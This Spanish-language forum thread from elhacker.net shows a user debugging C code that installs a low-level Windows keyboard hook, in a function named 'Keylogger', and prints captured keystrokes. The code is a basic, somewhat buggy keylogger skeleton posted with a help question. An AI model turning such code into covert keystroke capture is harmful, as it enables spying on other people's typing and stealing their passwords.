elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  Problema con AttachThreadInput
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Problema con AttachThreadInput  (Leído 1,653 veces)
someRandomCode

Desconectado Desconectado

Mensajes: 250



Ver Perfil
Problema con AttachThreadInput
« en: 28 Noviembre 2012, 23:59 pm »

Bueno, muchachos, en realidad CREO que el problema esta ahi, eh aqui el codigo:
Código:
#include <windows.h>
HHOOK hKeyHook = NULL;
__declspec(dllexport) LRESULT CALLBACK Teclazo(int nCode, WPARAM wParam, LPARAM lParam) {
HWND ventana;
BYTE Buffer[100];
KBDLLHOOKSTRUCT hooked = *((KBDLLHOOKSTRUCT*)lParam);
BYTE Status;
char Mensaje[100];
ventana = GetForegroundWindow();
DWORD thread;
if (ventana) {
thread = GetWindowThreadProcessId(ventana,NULL);
if (thread) {
AttachThreadInput(GetCurrentThreadId(),thread,TRUE);
}
}
ToAscii(hooked.vkCode,hooked.scanCode,NULL,(LPWORD)Buffer,0);
printf("%c: \n",Buffer[0]);
printf("%c: \n",Buffer[1]);
AttachThreadInput(GetCurrentThreadId,thread,FALSE);
return CallNextHookEx(NULL,nCode,wParam,lParam);
}
void LoopDeMensajes(){
MSG msg;
while (GetMessage(&msg,NULL,0,0)) {
TranslateMessage(&msg);
DispatchMessage(&msg);
}
}
DWORD WINAPI Keylogger() {
hKeyHook = SetWindowsHookEx(WH_KEYBOARD_LL,(HOOKPROC)Teclazo,GetModuleHandle(NULL),NULL);
LoopDeMensajes();
UnhookWindowsHookEx(hKeyHook);
}

int main() {
DWORD dwThread = 0;
HANDLE hThread = CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)Keylogger,(LPVOID)NULL,NULL,dwThread);
if (hThread) {
return WaitForSingleObject(hThread,INFINITE);
}
}

El problema es que parece que no estoy levantando la tecla en si, aunque si estoy hookeando bien el proceso porque me esta retornando dos lineas por cada tecla que aprete, no importa en donde.


En línea

someRandomCode

Desconectado Desconectado

Mensajes: 250



Ver Perfil
Re: Problema con AttachThreadInput
« Respuesta #1 en: 29 Noviembre 2012, 00:17 am »

Nada nada, solucionado, que pena que quede el codigo tirado ´visible para todos.. Se ven "mis manchas" jaja


En línea

x64core


Desconectado Desconectado

Mensajes: 1.908


Ver Perfil
Re: Problema con AttachThreadInput
« Respuesta #2 en: 29 Noviembre 2012, 06:57 am »

Nada nada, solucionado, que pena que quede el codigo tirado ´visible para todos.. Se ven "mis manchas" jaja

Eso ayuda a otros que tengo algun problema similar  :)
En línea

someRandomCode

Desconectado Desconectado

Mensajes: 250



Ver Perfil
Re: Problema con AttachThreadInput
« Respuesta #3 en: 29 Noviembre 2012, 11:12 am »

El unico problema que tengo ahora es que me recibe los eventos duplicados.. alguna idea?
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema BlueZScanner y problema de conexión
Hacking Mobile
Kasswed 3 6,327 Último mensaje 6 Mayo 2006, 22:04 pm
por Gospel
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines